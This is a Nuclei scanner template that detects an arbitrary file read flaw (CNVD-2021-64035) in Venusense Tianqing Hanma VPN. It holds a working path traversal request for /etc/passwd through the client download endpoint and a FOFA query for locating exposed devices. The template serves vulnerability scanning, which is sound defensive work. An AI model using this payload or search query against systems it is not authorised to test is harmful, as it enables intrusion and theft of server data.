id: venustech-vpn-download-file-read

info:
  name: Venusense Hanma VPN Arbitrary File Read
  author: Co5mos
  severity: critical
  reference: 
    - https://github.com/projectdiscovery/nuclei-templates/blob/d6003d408f5d1dd71ca16d1baf8f5fd00e332e58/http/cnvd/2021/CNVD-2021-64035.yaml
    - https://github.com/wy876/POC/blob/main/%E5%90%AF%E6%98%8E%E6%98%9F%E8%BE%B0/%E5%90%AF%E6%98%8E%E6%98%9F%E8%BE%B0-%E5%A4%A9%E6%B8%85%E6%B1%89%E9%A9%ACVPN%E6%8E%A5%E5%8F%A3download%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.md
  description: |
    启明星辰天清汉马VPN系统download接口处存在任意文件读取漏洞，获取服务器的敏感数据和配置信息，造成系统的不安全性，从而控制服务器。
  metadata:
    verified: true
    fofa-query: 'icon_hash="-15980305" || app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN"'
  tags: venusense, vpn, file-read
  

http:
  - method: GET
    path:
      - '{{BaseURL}}/vpn/user/download/client?ostype=../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      
      - type: word
        part: body
        words:
          - "root:x:0:0:"